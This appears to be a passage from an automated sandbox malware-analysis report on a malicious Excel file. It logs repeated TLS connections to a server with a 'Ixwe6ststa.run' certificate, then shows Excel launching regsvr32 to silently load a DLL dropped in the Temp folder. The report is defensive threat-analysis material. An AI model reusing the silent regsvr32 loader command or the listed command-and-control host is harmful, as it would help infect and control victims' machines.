                                                                                                                                Jan 11, 2021 20:48:24.263045073 CET77.220.64.37443192.168.2.2249241CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:26.370615005 CET77.220.64.37443192.168.2.2249245CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:28.459825993 CET77.220.64.37443192.168.2.2249249CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:30.625606060 CET77.220.64.37443192.168.2.2249253CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:32.715358019 CET77.220.64.37443192.168.2.2249257CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:34.991720915 CET77.220.64.37443192.168.2.2249261CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:37.467885017 CET77.220.64.37443192.168.2.2249265CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:39.556782007 CET77.220.64.37443192.168.2.2249269CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:41.984070063 CET77.220.64.37443192.168.2.2249273CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:44.053273916 CET77.220.64.37443192.168.2.2249277CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:46.141494989 CET77.220.64.37443192.168.2.2249281CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:48.231997967 CET77.220.64.37443192.168.2.2249285CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:50.588830948 CET77.220.64.37443192.168.2.2249289CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:53.152586937 CET77.220.64.37443192.168.2.2249293CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:55.305953026 CET77.220.64.37443192.168.2.2249297CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:57.392349005 CET77.220.64.37443192.168.2.2249301CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:48:59.528377056 CET77.220.64.37443192.168.2.2249305CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:01.635515928 CET77.220.64.37443192.168.2.2249309CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:03.742063999 CET77.220.64.37443192.168.2.2249313CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:05.829690933 CET77.220.64.37443192.168.2.2249317CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:07.983521938 CET77.220.64.37443192.168.2.2249321CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:10.091630936 CET77.220.64.37443192.168.2.2249325CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:10.363346100 CET77.220.64.37443192.168.2.2249325CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:12.602010012 CET77.220.64.37443192.168.2.2249329CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:14.691394091 CET77.220.64.37443192.168.2.2249333CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:16.782727003 CET77.220.64.37443192.168.2.2249337CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:18.908240080 CET77.220.64.37443192.168.2.2249341CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:21.025764942 CET77.220.64.37443192.168.2.2249345CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:23.132543087 CET77.220.64.37443192.168.2.2249349CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:25.253665924 CET77.220.64.37443192.168.2.2249353CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:27.361910105 CET77.220.64.37443192.168.2.2249357CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:29.545078993 CET77.220.64.37443192.168.2.2249361CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:31.731226921 CET77.220.64.37443192.168.2.2249365CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:33.865737915 CET77.220.64.37443192.168.2.2249369CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:35.922477961 CET77.220.64.37443192.168.2.2249373CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:38.016786098 CET77.220.64.37443192.168.2.2249377CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:40.432838917 CET77.220.64.37443192.168.2.2249381CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:42.567636967 CET77.220.64.37443192.168.2.2249385CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:44.693638086 CET77.220.64.37443192.168.2.2249389CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:46.785083055 CET77.220.64.37443192.168.2.2249393CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                Jan 11, 2021 20:49:48.890332937 CET77.220.64.37443192.168.2.2249397CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87

                                                                                                                                Code Manipulations

                                                                                                                                Statistics

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Start time:20:47:36
                                                                                                                                Start date:11/01/2021
                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                Imagebase:0x13fef0000
                                                                                                                                File size:27641504 bytes
                                                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:20:47:43
                                                                                                                                Start date:11/01/2021
                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
                                                                                                                                Imagebase:0xff490000
                                                                                                                                File size:19456 bytes
                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:20:47:43
                                                                                                                                Start date:11/01/2021
                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
                                                                                                                                Imagebase:0xfa0000
                                                                                                                                File size:14848 bytes
                                                                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate

                                                                                                                                General

                                                                                                                                Start time:20:48:01
                                                                                                                                Start date:11/01/2021
                                                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1016
                                                                                                                                Imagebase:0x13f0f0000
                                                                                                                                File size:995024 bytes
                                                                                                                                MD5 hash:45A078B2967E0797360A2D4434C41DB4
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate

                                                                                                                                General

                                                                                                                                Start time:20:48:01
                                                                                                                                Start date:11/01/2021
                                                                                                                                Path:C:\Windows\System32\DWWIN.EXE
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\dwwin.exe -x -s 1016
                                                                                                                                Imagebase:0xff080000
                                                                                                                                File size:152576 bytes
                                                                                                                                MD5 hash:25247E3C4E7A7A73BAEEA6C0008952B1
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate

                                                                                                                                Disassembly

                                                                                                                                Code Analysis

                                                                                                                                Reset < >